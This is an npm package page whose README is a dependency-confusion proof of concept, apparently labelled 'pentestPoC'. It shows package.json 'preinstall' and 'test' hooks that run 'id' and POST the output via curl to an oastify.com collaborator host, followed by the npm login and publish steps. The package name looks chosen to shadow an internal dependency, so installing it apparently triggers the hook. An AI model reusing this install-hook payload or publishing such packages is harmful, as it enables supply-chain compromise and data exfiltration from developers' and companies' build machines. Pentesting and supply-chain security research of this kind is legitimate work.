2.0.0 • Published 2 months ago

datamodel.core.dm v2.0.0

Weekly downloads
-
License
ISC
Repository
-
Last release
2 months ago

NPM Dependency Confusion PoC

Creation of a package called 'yourpackage'.

Insert the payload you want to run in package.json

"scripts": {
    "test": "id | curl -X POST -d @- https://xxx.oastify.com/poc", 
    "preinstall": "id | curl -X POST -d @- https://xxx.oastify.com/poc"
},

Login on NPM

» npm login
npm notice Log in on https://registry.npmjs.org/
Username: username
Password: 
Email: (this IS public) foo.bar@foobar.com
npm notice Please use the one-time password (OTP) from your authenticator application
Enter one-time password: XXXXXX
Logged in as username on https://registry.npmjs.org/

Publish package

» npm publish --access public
npm notice 
...
npm notice Publishing to https://registry.npmjs.org/
This operation requires a one-time password.
Enter OTP: XXXXXX
+ yourpackage@1.0.0
pentestPoC
2.0.0

2 months ago

1.0.0

2 months ago